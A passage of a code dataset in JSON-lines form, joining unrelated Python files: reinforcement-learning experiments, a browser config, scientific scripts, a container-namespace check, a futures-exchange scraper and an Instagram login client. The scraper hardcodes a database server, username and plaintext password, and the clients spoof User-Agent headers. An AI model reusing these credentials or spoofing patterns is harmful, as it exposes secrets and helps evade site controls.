dense2=Dense(4,activation='relu')(merged)\n outputs=Dense(actions,activation='linear')(merged)\n \n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent4.png')\n return model\n\ndef agent5(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(4, activation='relu')(fin_1)\n D_2=(Dense(4, activation='relu')(D_1))\n D_3=(Dense(4, activation='relu')(D_2))\n out1=D_3\n \n D_11=(Dense(4, activation='relu')(fin_1))\n D_22=(Dense(4, activation='relu')(D_11))\n D_33=(Dense(4, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(4, activation='relu')(fin_1))\n D_222=(Dense(4, activation='relu')(D_111))\n D_333=(Dense(4, activation='relu')(D_222))\n out3=D_333\n \n\n merged=concatenate([out1,out2,out3])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent5.png')\n return model\n \n\n\narchs=[ agent0, agent1,agent2,agent3,agent4,agent5]\nmodel_names=['agent0','agent1','agent2','agent3','agent4','agent5']\nfor i in range(len(archs)):\n arch=archs[i]\n model_name=model_names[i]\n filename=log_dir+algo+'_'+model_name\n model_name=0\n #Getting our neural network\n model = arch(states, actions)\n #Defining SARSA Keras-RL agent: inputing the policy and the model\n model = SARSAAgent(model=model, nb_actions=actions, policy=EpsGreedyQPolicy())\n #Compiling SARSA with mean squared error loss\n model.compile('adam', metrics=[\"mse\"])\n callbacks = build_callbacks(filename)\n #Training the agent for 50000 steps\n x=model.fit(env, nb_steps=50000, visualize=False, verbose=1,callbacks=callbacks)\n #Testing\n test_scores = model.test(env, nb_episodes = 1000, visualize= False)\n\n with open(filename+'_test.json', 'w') as fp:\n json.dump(test_scores.history, fp)\n\n","sub_path":"Stacking/cartpole-experiments/SARSA.py","file_name":"SARSA.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"2496997","text":"import subprocess\nconfig.load_autoconfig()\n# exec(open(\"/home/ll/.bin/mm.py\").read())\n\nc.spellcheck.languages = ['en-GB']\nc.auto_save.session = True\nc.completion.cmd_history_max_items = 1000\nc.completion.scrollbar.padding = 0\nc.content.headers.accept_language = \"en-GB,en,en-US\"\nc.content.notifications = True \n# c.content.user_stylesheets = [\"styles/style2.css\"]\n# config.set(\"colors.webpage.darkmode.enabled\", True)\nc.downloads.open_dispatcher = \"xdg-open\"\nc.downloads.position = \"bottom\"\nc.input.insert_mode.auto_load = False\nc.messages.timeout = 3000\nc.editor.command = [\"st\", \"-e\", \"nvim\", \"{}\"]\nc.prompt.radius = 0\n# c.scrolling.bar = \"never\"\nc.scrolling.bar = \"always\"\nc.scrolling.smooth = True\nc.statusbar.padding = {\"top\": 0, \"right\": 0, \"bottom\": 0, \"left\": 0}\nc.statusbar.widgets = [\"url\", \"scroll_raw\", \"progress\"]\nc.tabs.background = True\n#c.tabs.favicons.scale = 2\n#c.tabs.indicator.padding = {\"top\": 0, \"right\": 0, \"bottom\": 0, \"left\": 0}\nc.tabs.position = \"top\"\nc.tabs.show = \"always\"\n# c.tabs.show_switching_delay = 2000\n# c.tabs.title.format = \"\"\n# c.tabs.title.format_pinned = c.tabs.title.format\n# c.tabs.width = 24\n# c.tabs.indicator.width = 0\nc.tabs.padding = {\"top\": 3, \"right\": 3, \"bottom\": 3, \"left\": 3}\nc.url.start_pages = \"about:blank\"\nc.url.default_page = \"https://www.google.com\"\nc.downloads.location.prompt = False\nc.content.geolocation = False\nc.content.ssl_strict = True\n#c.downloads.remove_finished = 800\nc.hints.dictionary = \"/usr/share/dict/british\"\nc.url.searchengines = {\"DEFAULT\": \"https://google.com/search?&q={}\",\n\"dd\": \"https://www.duckduckgo.com/?q={}\",\n\"ddi\": \"https://duckduckgo.com/?q={}&iar=images\",\n\"ggi\": \"https://www.google.co.uk/search?q={}&tbm=isch\",\n\"w\": \"https://en.wikipedia.org/w/index.php?search={}\",\n\"st\": \"http://store.steampowered.com/search/?term={}\",\n\"g\": \"https://www.google.com/search?q={}\",\n\"gi\": \"https://www.google.com/search?q={}&tbm=isch\",\n\"mw\": \"http://en.uesp.net/w/index.php?title=Special%3ASearch&search={}\",\n\"aur\": \"https://aur.archlinux.org/packages/?O=0&K={}\",\n\"pac\": \"https://www.archlinux.org/packages/?sort=&arch=x86_64&maintainer=&flagged=&q={}\",\n\"aw\": \"https://wiki.archlinux.org/index.php?title=Special%3ASearch&search={}\",\n\"gw\": \"https://wiki.gentoo.org/index.php?title=Special%3ASearch&search={}&go=Go\",\n\"i\": \"http://www.imdb.com/find?ref_=nv_sr_fn&s=all&q={}\",\n\"dick\": \"https://en.wiktionary.org/wiki/{}\",\n\"ety\": \"http://www.etymonline.com/index.php?allowed_in_frame=0&search={}\",\n\"u\": \"http://www.urbandictionary.com/define.php?term={}\",\n\"y\": \"https://www.youtube.com/results?search_query={}\",\n\"r\": \"https://www.reddit.com/r/{}/new/\",\n\"it\": \"https://itch.io/search?q={}\",\n\"tpb\": \"https://thepiratebay.org/search/{}/0/7/0\",\n\"p\": \"https://www.protondb.com/search?q={}\",\n\"a\": \"https://www.amazon.co.uk/s/?url=search-alias&field-keywords={}\", \n\"eb\": \"https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw={}&_sacat=0\", \n\"ji\": \"https://jiji.co.ke/search?query={}\", \n\"ju\": \"https://www.jumia.co.ke/catalog/?q={}\", \n}\nc.completion.open_categories = [\"quickmarks\", \"bookmarks\", \"history\"]\n# ads\nc.content.host_blocking.enabled = True\nc.content.host_blocking.lists.append(\"http://sbc.io/hosts/hosts\")\nc.content.host_blocking.whitelist = [\"thepiratebay.org\", \"www.bet365.com\"]\n\n# zoom\n\nc.zoom.default = 100\n\n# colours\n\ndef read_xresources(prefix):\n props = {}\n x = subprocess.run(['xrdb', '-query'], stdout=subprocess.PIPE)\n lines = x.stdout.decode().split('\\n')\n for line in filter(lambda l : l.startswith(prefix), lines):\n prop, _, value = line.partition(':\\t')\n props[prop] = value\n return props\n\nxresources = read_xresources('*')\n\nc.colors.completion.fg = xresources['*.foreground']\nc.colors.completion.even.bg = xresources['*.background']\nc.colors.completion.odd.bg = xresources['*.background']\nc.colors.completion.category.fg = xresources['*.foreground']\nc.colors.completion.category.bg = xresources['*.background']\nc.colors.completion.category.border.top = xresources['*.background']\nc.colors.completion.item.selected.fg = c.colors.completion.category.fg\nc.colors.completion.item.selected.bg = xresources['*.color13']\nc.colors.completion.item.selected.border.top = c.colors.completion.item.selected.bg\nc.colors.completion.item.selected.border.bottom = xresources['*.background']\nc.colors.completion.match.fg = xresources['*.color14']\nc.colors.completion.scrollbar.bg = xresources['*.color0']\nc.colors.completion.scrollbar.fg = xresources['*.color8']\nc.colors.completion.category.border.bottom = xresources['*.background']\nc.colors.completion.category.border.top = xresources['*.background']\nc.colors.statusbar.command.fg = xresources['*.foreground']\nc.colors.statusbar.command.bg = xresources['*.background']\nc.colors.statusbar.insert.bg = xresources['*.color2']\nc.colors.statusbar.caret.bg = xresources['*.color4']\nc.colors.statusbar.progress.bg = xresources['*.foreground']\nc.colors.statusbar.url.success.http.fg = xresources['*.foreground']\nc.colors.statusbar.url.success.https.fg = xresources['*.color10']\nc.colors.statusbar.url.error.fg = c.colors.completion.fg\nc.colors.statusbar.url.warn.fg = c.colors.completion.fg\nc.colors.statusbar.url.hover.fg = xresources['*.color14']\nc.colors.tabs.odd.fg = xresources['*.foreground']\nc.colors.tabs.odd.bg = \"#555555\"\nc.colors.tabs.even.fg = c.colors.tabs.odd.fg\nc.colors.tabs.even.bg = c.colors.tabs.odd.bg\nc.colors.tabs.selected.odd.bg = xresources['*.color7']\nc.colors.tabs.selected.odd.fg = xresources['*.background']\nc.colors.tabs.selected.even.fg = c.colors.tabs.selected.odd.fg\nc.colors.tabs.selected.even.bg = c.colors.tabs.selected.odd.bg\nc.colors.tabs.bar.bg = '#292929'\nc.hints.border = \"1px solid transparent\"\nc.colors.hints.fg = xresources['*.background']\nc.colors.hints.bg = xresources['*.color11']\nc.colors.hints.match.fg = xresources['*.color2']\nc.colors.downloads.bar.bg = xresources['*.background']\nc.colors.downloads.start.fg = xresources['*.foreground']\nc.colors.downloads.system.fg = \"none\"\nc.colors.downloads.system.fg = \"none\"\nc.colors.downloads.error.fg = xresources['*.foreground']\nc.colors.downloads.error.bg = xresources['*.color13']\nc.colors.webpage.bg = xresources['*.foreground']\nc.colors.messages.error.fg = xresources['*.foreground']\nc.colors.messages.error.bg = xresources['*.color5']\nc.colors.messages.error.border = c.colors.messages.error.bg\nc.colors.messages.warning.fg = xresources['*.foreground']\nc.colors.messages.warning.bg = xresources['*.color4']\nc.colors.messages.warning.border = c.colors.messages.warning.bg\nc.colors.messages.info.fg = xresources['*.foreground']\nc.colors.messages.info.bg = xresources['*.background']\nc.colors.messages.info.border = c.colors.messages.info.bg\nc.colors.prompts.fg = xresources['*.foreground']\nc.colors.prompts.bg = xresources['*.color4']\nc.colors.prompts.selected.bg = xresources['*.color12']\n\n# keys\n\n#config.bind('', 'spawn --detach mpv --force-window yes {url}')\n# config.bind('', 'spawn --detach mpv --force-window yes --ytdl-format=160+249 {url}')\nconfig.bind('', 'spawn --detach mpv --force-window yes {url}')\nconfig.bind('zd', 'download-open')\nconfig.bind('xx', 'config-cycle tabs.show switching always')\nconfig.bind('xp', 'spawn ~/.local/bin/pocketadd {url}')\n# config.bind('xh', 'config-cycle content.user_stylesheets /home/ll/.config/qutebrowser/styles/style2.css /home/ll/.config/qutebrowser/styles/style.css')\n# config.bind('xh', 'config-cycle content.user_stylesheets \"\" /home/ll/.config/qutebrowser/styles/style2.css')\nconfig.bind('B', 'set-cmd-text -s :bookmark-load')\nconfig.bind('xs', 'config-source')\nconfig.bind('xb', 'config-cycle statusbar.show in-mode always')\nconfig.bind('', 'tab-prev')\nconfig.bind('', 'tab-next')\nconfig.bind('', 'tab-give')\n# Unbind shite defaults\nconfig.unbind('q')\n# config.unbind('z')\nconfig.unbind('')\n\nconfig.bind('', 'hint links spawn --detach mpv --force-window yes {hint-url}')\n\n# configs are for downloading videos and music\nconfig.bind('zy', 'hint links spawn ~/.local/bin/ytdv {hint-url}')\nconfig.bind('zp', 'hint links spawn ~/.local/bin/ytdlp {hint-url} ~/Downloads/qbdownloads')\nconfig.bind('zv', 'spawn ~/.local/bin/ytdv {url}')\nconfig.bind('qr', 'spawn ~/.local/bin/qr {url}')\n\n# Dealing with login forms\n# config.bind('', 'spawn --userscript password_fill')\nconfig.bind('<,>', \"spawn --userscript qute-pass -U secret -u 'username: (.+)'\")\n# config.bind('<,>', 'spawn --userscript qute-pass --username-target secret --username-regex \"username: (.+)\"')\nconfig.bind('<,>', 'spawn --userscript qute-pass --username-only')\nconfig.bind('<,>

', 'spawn --userscript qute-pass --password-only')\nconfig.bind('<,>', 'spawn --userscript qute-pass --otp-only')\n","sub_path":".config/qutebrowser/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"432754019","text":"import tensorflow as tf\n\n\n\nwith tf.gfile.FastGFile('frozen_inference_graph.pb', 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read()) \n\nsession_h_w = tf.Session(graph=graph_def)\n\n ","sub_path":"cnn/test_restore_2_graphs.py","file_name":"test_restore_2_graphs.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"605636209","text":"import sys\r\nimport os\r\n\r\ndef main():\r\n pid=sys.argv[1]\r\n file_path='/proc'+pid+'/ns'\r\n #获取容器内Nsid\r\n command1=\"\"\"sudo ls -l %s 2>log |awk 'NR==5{print $l1}'|grep -o'[0-9]\\{10\\}'\"\"\"%file_path\r\n result1=os.popen(command1).read().split()[0]\r\n #获取主机初始化进程Nsid\r\n command2 = \"\"\"sudo ls -l /proc/1/ns 2>log |awk 'NR==5{print $l1}'|grep -o'[0-9]\\{10\\}'\"\"\" % file_path\r\n result2 = os.popen(command2).read().split()[0]\r\n\r\n if result1==result2:\r\n print(\"9\")\r\n else:\r\n print(\"1\")\r\n\r\n\r\nmain()\r\n\r\n","sub_path":"Intrusion Detection System/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462040013","text":"from Qt import QtWidgets\n\nfrom openpype.style import load_stylesheet\n\n\nclass MyExampleDialog(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super(MyExampleDialog, self).__init__(parent)\n\n self.setWindowTitle(\"Connected modules\")\n\n label_widget = QtWidgets.QLabel(self)\n\n ok_btn = QtWidgets.QPushButton(\"OK\", self)\n btns_layout = QtWidgets.QHBoxLayout()\n btns_layout.addStretch(1)\n btns_layout.addWidget(ok_btn)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(label_widget)\n layout.addLayout(btns_layout)\n\n ok_btn.clicked.connect(self._on_ok_clicked)\n\n self._label_widget = label_widget\n\n self.setStyleSheet(load_stylesheet())\n\n def _on_ok_clicked(self):\n self.done(1)\n\n def set_connected_modules(self, connected_modules):\n if connected_modules:\n message = \"\\n\".join(connected_modules)\n else:\n message = (\n \"Other enabled modules/addons are not using my interface.\"\n )\n self._label_widget.setText(message)\n","sub_path":"openpype/modules/example_addons/example_addon/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"367474106","text":"import pytest\nimport xarray as xr\nfrom IPython.display import display\n\nfrom climpred.classes import HindcastEnsemble, PerfectModelEnsemble\n\n\n@pytest.mark.parametrize(\"display_style\", (\"html\", \"text\"))\ndef test_repr_PM(PM_da_initialized_1d, PM_da_control_1d, display_style):\n \"\"\"Test html and text repr.\"\"\"\n with xr.set_options(display_style=display_style):\n pm = PerfectModelEnsemble(PM_da_initialized_1d)\n display(pm)\n pm = pm.add_control(PM_da_control_1d)\n display(pm)\n pm = pm.generate_uninitialized()\n display(pm)\n\n\n@pytest.mark.parametrize(\"display_style\", (\"html\", \"text\"))\ndef test_repr_HC(\n hind_ds_initialized_1d,\n hist_ds_uninitialized_1d,\n observations_ds_1d,\n display_style,\n):\n \"\"\"Test html repr.\"\"\"\n with xr.set_options(display_style=display_style):\n he = HindcastEnsemble(hind_ds_initialized_1d)\n display(he)\n he = he.add_uninitialized(hist_ds_uninitialized_1d)\n display(he)\n he = he.add_observations(observations_ds_1d)\n display(he)\n # no uninit\n he = HindcastEnsemble(hind_ds_initialized_1d)\n he = he.add_observations(observations_ds_1d)\n display(he)\n","sub_path":"climpred/tests/test_repr.py","file_name":"test_repr.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217433421","text":"from typing import List\n\nfrom HighGraphPreprocessing import HighGraphPreprocessing, logger, Node\nfrom NeighborManager import NeighborManager\nfrom LayerManager import LayerManager\nfrom ComponentCollector import ComponentCollector\nfrom ReachabilityEstimator import ReachabilityEstimator\nimport numpy as np\n\n\nclass SizeEstimation:\n def __init__(self, high_subgraph: HighGraphPreprocessing,\n neighbor_manager: NeighborManager,\n layer_manager: LayerManager,\n component_collector: ComponentCollector,\n reachability_estimator: ReachabilityEstimator,\n component_layer_num: int = 2):\n self.high_subgraph = high_subgraph\n self.neighbor_manager = neighbor_manager\n self.layer_manager = layer_manager\n self.component_collector = component_collector\n self.reachability_estimator = reachability_estimator\n self.component_layer_num = component_layer_num\n self.flush()\n\n def flush(self):\n self.up_nodes = []\n self.up_sum_deg = 0.\n self.up_num_nodes = 0.\n self.down_nodes = []\n self.down_weighted_sum_deg = 0.\n self.down_sum_reach = 0.\n\n\n def update_up(self, up_nodes_diff: List[Node]):\n new_up_sum_deg = np.sum([len(self.neighbor_manager.neighbors_above(v, self.component_layer_num - 1))\n for v in up_nodes_diff])\n self.up_nodes += up_nodes_diff\n self.up_sum_deg += new_up_sum_deg\n self.up_num_nodes += len(up_nodes_diff)\n\n def update_down(self, down_nodes_diff: List[Node]):\n components = [self.component_collector.component_bfs(v)\n for v in down_nodes_diff]\n inv_reachabilities = np.array([1./self.reachability_estimator.component_reachability(comp)\n for comp in components])\n degrees_down = np.array([self.component_collector.num_neighbors_of_component(comp) / len(comp)\n for comp in components])\n self.down_nodes += down_nodes_diff\n self.down_weighted_sum_deg += np.sum(degrees_down * inv_reachabilities)\n self.down_sum_reach += np.sum(inv_reachabilities)\n\n def estimate_average_deg_up(self):\n return self.up_sum_deg / self.up_num_nodes\n\n def estimate_average_deg_down(self):\n return self.down_weighted_sum_deg / self.down_sum_reach\n\n def estimate_size(self, prev_layer_size, verbose = False):\n up_deg = self.estimate_average_deg_up()\n down_deg = self.estimate_average_deg_down()\n if verbose:\n print(\"Up:\", up_deg, \"\\nDown:\", down_deg)\n return prev_layer_size * up_deg / down_deg\n\n def estimate_size_old(self, layer_num: int,\n prev_layer_size: int,\n node_samples_prev_layer: list,\n node_samples_curr_layer: list):\n if layer_num is 0:\n return len(self.high_subgraph.L0_set)\n if layer_num is 1:\n return len(self.high_subgraph.L1_set)\n\n avg_deg_up = np.mean([len(self.neighbor_manager.neighbors_above(v, layer_num - 1)) for v in node_samples_prev_layer])\n\n if layer_num < self.component_layer_num:\n avg_deg_down = np.mean([len(self.neighbor_manager.neighbors_up_to(v, layer_num - 1)) for v in node_samples_curr_layer])\n else:\n components = [self.component_collector.component_bfs(u) for u in node_samples_curr_layer]\n degrees_down = [self.component_collector.num_neighbors_of_component(comp) / len(comp) for comp in components]\n avg_deg_down = np.mean(degrees_down)\n print(avg_deg_up)\n print(avg_deg_down)\n size = prev_layer_size * avg_deg_up / avg_deg_down\n return size","sub_path":"code/SizeEstimation.py","file_name":"SizeEstimation.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435624437","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate\n\nfig = plt.figure()\nplot1 = fig.add_subplot(2,1,1)\nplot2 = fig.add_subplot(2,1,2)\n\nfor subplt in (plot1, plot2):\n subplt.axis([-5, 5, -5, 5])\n subplt.set_xticks([])\n subplt.set_yticks([])\n subplt.set_xlabel('t')\nplot1.set_ylabel('u')\nplot2.set_ylabel('v')\n\n\ndef f(t, y):\n (u, v) = y\n return np.array([1, 0.2*u*v])\n\nr = scipy.integrate.ode(f).set_integrator('zvode', method='bdf')\nfor initval in np.linspace(-5, 5, 10):\n r.set_initial_value(np.array([-5., initval]), -5.)\n t1 = 5.\n dt = 0.01\n pts = []\n while r.successful() and r.t < t1:\n pts.append(r.y)\n r.integrate(r.t + dt)\n traj = np.array(pts)\n ts = np.linspace(-5, 5, traj.shape[0])\n plot1.plot(ts, traj[:,0])\n plot2.plot(ts, traj[:,1])\n\nfig.subplots_adjust(left=0.1, right=0.95)\nfig.set_size_inches(2, 4)\nfig.savefig('figexmpls/diffeq_mockup.pdf')\n","sub_path":"exmpl_overview_diffeq_mockup.py","file_name":"exmpl_overview_diffeq_mockup.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654284655","text":"from qutip import *\nimport numpy as np\nfrom math import *\n\n\nH = 0.6*(destroy(2) + destroy(2).dag())\n\ntime = np.linspace(0,20,2000)\n\npsi0 = basis(2,1)\n\ndata = mcsolve(H,psi0,time,[sqrt(0.1)*destroy(2).dag()],[sigmaz()])\n\nwith open(\"data.dat\",'w') as f:\n\tfor j in range(0,len(time)):\n\t\tf.write(str(j) + \" \" + str(data.expect[0][j]) + \"\\n\")","sub_path":"Quantum_Jump/matrix/src/Q_Jump_QuTip.py","file_name":"Q_Jump_QuTip.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"470334968","text":"import json\nfrom pprint import pprint\nimport webbrowser\n\nclass Assignment2:\n '''\n Assignment2 class handles all of the parsing and display's the parsed map\n '''\n def __init__(self):\n pass;\n \n def jLoad(self, filePath):\n '''\n jLoad loads in the json file and returns the raw data\n '''\n jsonFile = open(filePath);\n json_raw_data = json.load(jsonFile);\n jsonFile.close();\n return json_raw_data;\n\n def jParse(self, filePath):\n '''\n jParse parses the data into a dict where key = city name and\n value = city information\n returns the parsed data\n '''\n json_data = self.jLoad(filePath);\n metros = json_data[\"metros\"];\n routes = json_data[\"routes\"];\n cityPorts = [];\n #Takes all of the cities in the raw data and uses the full city name\n #as the key in a new dictionary. The city information is the new value\n for x in range(len(metros)):\n flightList = {};\n for i in range(len(routes)):\n #searches for all of the different one-way routes\n #and puts them into a dictionary\n if metros[x][\"code\"] == routes[i][\"ports\"][0]:\n cityFinder = routes[i][\"ports\"][1];\n for y in range(len(metros)):\n if cityFinder == metros[y][\"code\"]:\n cityFinder = metros[y][\"name\"];\n flightList[cityFinder] = routes[i][\"distance\"];\n elif metros[x][\"code\"] == routes[i][\"ports\"][1]:\n cityFinder = routes[i][\"ports\"][0];\n for y in range(len(metros)):\n if cityFinder == metros[y][\"code\"]:\n cityFinder = metros[y][\"name\"];\n flightList[cityFinder] = routes[i][\"distance\"];\n #Adds the new route list to the city information\n metros[x]['direct cities'] = flightList;\n #creates a new dictionary to reorganize the data\n airportDict = dict([(metros[x][\"name\"],metros[x]) for x in range(len(metros))]);\n #removes city name from the city information and makes it the key\n for k in range(len(metros)):\n name = metros[k][\"name\"];\n del airportDict[name]['name'];\n return airportDict;\n\n\n def displayRouteMap(self, dict):\n '''\n displayRouteMap takes the parsed data and creates a URL\n it then opens up a browser and automatically adds the URL\n '''\n url = \"http://www.gcmap.com/mapui?P=\";\n routes = dict;\n for i in range(len(routes)):\n ports = routes[i][\"ports\"];\n url = url+ ports[0]+\"-\"+ports[1]+\",\";\n webbrowser.open_new(url);\n \n \n\n\n\n\n\n","sub_path":"AirportRouteComputations/Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"268050006","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 19 10:09:38 2017\n\n@author: tih\n\"\"\"\n\nTfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\avgsurft_inst\\mean\\T_GLDAS-NOAH_C_daily_2016.06.15.tif\"\nPfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\psurf_f_inst\\mean\\P_GLDAS-NOAH_kpa_daily_2016.06.15.tif\"\nHfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\qair_f_inst\\mean\\Hum_GLDAS-NOAH_kg-kg_daily_2016.06.15.tif\"\nOutfilename = r\"J:\\Tyler\\Input\\Meteo\\daily\\Hum_Calculated\\Humidity_percentage_Calculated_daily.tif\"\n\nimport gdal\nimport os\nimport wa.General.raster_conversions as RC\nimport wa.General.data_conversions as DC\nimport numpy as np\n\n\ngeo_out, proj, size_X, size_Y = RC.Open_array_info(Tfile)\nTdata = RC.Open_tiff_array(Tfile)\nTdata[Tdata<-900]=np.nan\nPdata = RC.Open_tiff_array(Pfile)\nHdata = RC.Open_tiff_array(Hfile)\n\n\nEsdata = 0.6108*np.exp((17.27*Tdata)/(Tdata+237.3))\nHumData = np.minimum((1.6077717*Hdata*Pdata/Esdata),1)*100\n \nDC.Save_as_tiff(Outfilename,HumData,geo_out,\"WGS84\") ","sub_path":"Processing_Scripts/METEO/CalcHumidityGLDASdata.py","file_name":"CalcHumidityGLDASdata.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"304608793","text":"import datetime\nimport pymssql\nimport re\nimport time\n\nimport requests\nimport json\nfrom fake_useragent import UserAgent\nua = UserAgent()\nheaders = {'User-Agent': ua.random}\n\nimport logging\n# 在控制台输出\nlogger = logging.getLogger('shfe_heyue')\nlogger.setLevel(level=logging.DEBUG)\nhandler = logging.FileHandler(filename='ErrorLog.log')\n\nhandler.setLevel(level=logging.INFO)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n# 输出到控制台\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\ndef getday():\n # oneday = datetime.timedelta(days=1)\n day = datetime.date.today()\n return str(day)\n\n\ndef get_html():\n try:\n today = day.replace('-', '')\n url = 'http://www.shfe.com.cn/data/dailydata/kx/pm%s.dat?isAjax=true' % today\n html = requests.get(url=url, headers=headers).text\n return html\n except BaseException:\n logger.error('today is not work')\n\n\ndef parse_html(html):\n data = json.loads(html)\n data = data['o_cursor']\n return data\n\n\ndef get_heyue(data):\n heyue = {}\n com = re.compile(r'[\\n \\t \\r \\xa0]')\n for k in data:\n if k['RANK'] not in [-1, 0, 999]:\n key = re.sub(com, '', k['INSTRUMENTID'])\n heyue[key] = []\n return heyue\n\n\ndef yield_str(heyue):\n for k, v in heyue.items():\n strs = '''{\"_AnalyzeModelName\":\"\",\"合约代码\":\"%s\",\"日期\":\"%s\",\"排名\":%s}''' % (\n k, day, v)\n strs = re.sub('\\'', '\\\"', strs)\n # if len(strs) > 2000:\n # print(strs, k, day)\n write_mssql(strs, k)\n\ndef write_mssql(strs, heyueID):\n '''写入数据库'''\n try:\n con = pymssql.connect(\n server=\"172.0.10.59\",\n user=\"gt\",\n password=\"server123!@#\",\n database=\"GtTrading\")\n cur = con.cursor()\n if not cur:\n print('数据库连接失败')\n\n sql = 'select top(1)* from objdata order by id desc'\n cur.execute(sql)\n result = cur.fetchall()\n contentid = result[0][1] + 1\n url = \"http://www.shfe.com.cn/statements/dataview.html?paramid=pm\"\n insertsql = 'insert into objdata (contentid,url,json,state) values (%s,%s,%s,1)'\n cur.execute(insertsql, (contentid, url, strs))\n con.commit()\n logger.info((day,contentid, 'ok +1'))\n con.close()\n except BaseException:\n logger.error('insert sql error')\n\ndef parse_heyue(data, heyue):\n com = re.compile(r'[\\n \\t \\r \\xa0]')\n for k in data:\n if k['RANK'] not in [-1, 0, 999]:\n key = re.sub(com, '', k['INSTRUMENTID'])\n item = {\"成交_名次\": str(k['RANK']),\n \"成交_会员\": re.sub(com, '', k['PARTICIPANTABBR1']),\n \"成交量\": str(k['CJ1']),\n \"成交_增减\": str(k['CJ1_CHG']),\n \"买单_名次\": str(k['RANK']),\n \"买单_会员\": re.sub(com, '', k['PARTICIPANTABBR2']),\n \"买单量\": str(k['CJ2']),\n \"买单_增减\": str(k['CJ2_CHG']),\n \"卖单_名次\": str(k['RANK']),\n \"卖单_会员\": re.sub(com, '', k['PARTICIPANTABBR3']),\n \"卖单量\": str(k['CJ3']),\n \"卖单_增减\": str(k['CJ3_CHG']),\n }\n heyue[key].append(item)\n return heyue\n\n\ndef main():\n html = get_html()\n data = parse_html(html)\n heyue = get_heyue(data)\n heyue = parse_heyue(data, heyue)\n # yield_str(heyue)\n\n\nif __name__ == '__main__':\n # while True:\n # hour_time = datetime.datetime.now().strftime('%H')\n # # day = '2018-08-22'\n # day = getday()\n # try:\n # if hour_time in ['18']:\n # main()\n # logger.info((day,'time sleep 1 hours'))\n # time.sleep(3602)\n # else:\n # logger.info('sleep 10 mins')\n # time.sleep(600)\n # except:\n # logger.info((day, 'time sleep 10mins'))\n # time.sleep(600)\n print('shfe_heyue'.center(80,'-'))\n day = '2018-08-23'\n main()\n logger.info((day,'ok '))\n\n","sub_path":"WorksZhang/pyspider/FuturesExchange/原交易所数据抓取/shfe_heyue.py","file_name":"shfe_heyue.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"447269257","text":"from utils import *\nfrom constants import *\nimport re\nimport time\nimport requests\nimport json\n\n# -*- coding: utf-8 -*-\n\n\nclass InstagramApi:\n def __init__(self, username, password, login = True):\n self.session = requests.Session()\n self.is_login = login\n if self.is_login == True:\n self.login(username, password)\n else:\n '''Required to obtain GIS'''\n self.set_headers()\n\n def set_headers(self, url = INSTAGRAM_URL):\n content = self.session.get(INSTAGRAM_URL).content\n\n header ={'x-csrftoken' : return_raw_content_data(content)[\"csrf_token\"],\n 'x-requested-with' : 'XMLHttpRequest',\n 'x-ig-app-id' : '1217981644879628',\n 'cookie' : 'ig_cb=1',\n 'X-Instagram-AJAX' : '1', \n 'Accept' : '*/*',\n 'User-Agent' : USER_AGENT,\n 'Accept-Language' : 'en-US',\n 'Accept-Encoding' : 'gzip, deflate',\n 'Connection' : 'close',\n 'Referer' : 'https://www.instagram.com',\n 'Authority' : 'www.instagram.com',\n 'Origin' : 'https://www.instagram.com',\n 'Content-Type' : 'application/x-www-form-urlencoded'\n }\n\n self.rhx_gis = return_raw_content_data(content)[\"rhx_gis\"]\n self.session.headers.update(header)\n\n def login(self, username, password):\n self.set_headers()\n\n data = {'username' : username,\n 'password' : password}\n\n login_response = self.session.post(\n '{}accounts/login/ajax/'.format(INSTAGRAM_URL),\n data = data,\n allow_redirects = True)\n\n if (login_response.status_code != 200):\n raise Exception(\"Login error with {}\".format(username))\n\n 